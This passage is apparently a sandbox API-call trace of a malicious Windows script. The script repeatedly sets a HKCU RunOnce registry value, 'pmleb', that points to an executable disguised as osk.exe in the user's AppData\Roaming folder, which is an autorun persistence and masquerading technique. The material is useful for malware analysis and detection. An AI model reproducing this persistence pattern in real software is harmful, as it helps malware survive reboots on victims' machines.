pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.265] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1 [0077.265] LoadRegTypeLib (in: rguid=0x74a014bc*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x33ef94*=0x0 | out: pptlib=0x33ef94*=0x7cb878) returned 0x0 [0077.268] ITypeLib:GetTypeInfoOfGuid (in: This=0x7cb878, GUID=0x74a014cc, ppTInfo=0x33ef78 | out: ppTInfo=0x33ef78*=0x7a9714) returned 0x0 [0077.268] ITypeInfo:GetRefTypeOfImplType (in: This=0x7a9714, index=0xffffffff, pRefType=0x33ef6c | out: pRefType=0x33ef6c*=0xfffffffe) returned 0x0 [0077.268] 
ITypeInfo:GetRefTypeInfo (in: This=0x7a9714, hreftype=0xfffffffe, ppTInfo=0x74a1501c | out: ppTInfo=0x74a1501c*=0x7a9740) returned 0x0 [0077.268] IUnknown:Release (This=0x7a9714) returned 0x1 [0077.268] IUnknown:Release (This=0x7cb878) returned 0x1 [0077.268] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.268] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.268] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.268] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.268] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.268] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.269] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.269] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.269] 
WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.269] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.269] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.270] RegCloseKey (hKey=0x280) returned 0x0 [0077.270] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.270] GetCurrentThreadId () returned 0x544 [0077.270] GetCurrentThreadId () returned 0x544 [0077.270] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.270] GetCurrentThreadId () returned 0x544 [0077.270] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7c64a0 [0077.271] SetTimer (hWnd=0x20280, nIDEvent=0x2001, uElapse=0xa, lpTimerFunc=0x0) returned 0x2001 [0077.277] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.277] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.277] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.277] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0077.277] SetTimer (hWnd=0x302a0, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0077.277] GetCurrentThreadId () returned 0x544 [0077.277] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.288] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.288] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.288] KillTimer (hWnd=0x20280, uIDEvent=0x2001) returned 1 [0077.288] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.288] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.288] IUnknown:Release (This=0x787518) returned 0x1 [0077.289] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.289] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.289] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.289] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.289] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, 
[1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.289] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.289] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.289] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.289] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.289] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2 [0077.289] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.290] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3 [0077.290] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, 
wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.290] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2 [0077.290] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.290] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.290] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.291] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.291] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.291] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.291] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.291] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.291] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.291] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.291] RegCloseKey (hKey=0x280) returned 0x0 [0077.291] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.292] GetCurrentThreadId () returned 0x544 [0077.292] GetCurrentThreadId () returned 0x544 [0077.292] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.292] SetTimer (hWnd=0x20280, nIDEvent=0x2002, uElapse=0xa, lpTimerFunc=0x0) returned 0x2002 [0077.292] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.304] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.304] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.304] KillTimer (hWnd=0x20280, uIDEvent=0x2002) returned 1 [0077.304] ISystemDebugEventFire:IsActive 
(This=0x7b4480) returned 0x1 [0077.304] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.304] IUnknown:Release (This=0x787518) returned 0x1 [0077.305] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.305] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.305] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.305] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.305] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, 
[4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.305] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.305] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.305] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.305] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.305] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3 [0077.306] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.306] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4 [0077.306] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, 
pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.307] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3 [0077.307] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.307] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.307] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.307] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.307] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.307] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.307] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.308] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.308] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.308] RegCloseKey (hKey=0x280) returned 0x0 [0077.308] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.308] GetCurrentThreadId () returned 0x544 [0077.308] GetCurrentThreadId () returned 0x544 [0077.308] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.309] SetTimer (hWnd=0x20280, nIDEvent=0x2003, uElapse=0xa, lpTimerFunc=0x0) returned 0x2003 [0077.309] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.319] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.319] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.319] KillTimer (hWnd=0x20280, uIDEvent=0x2003) returned 1 [0077.319] ISystemDebugEventFire:IsActive 
(This=0x7b4480) returned 0x1 [0077.320] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.320] IUnknown:Release (This=0x787518) returned 0x1 [0077.320] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.320] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.320] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.320] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.320] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, 
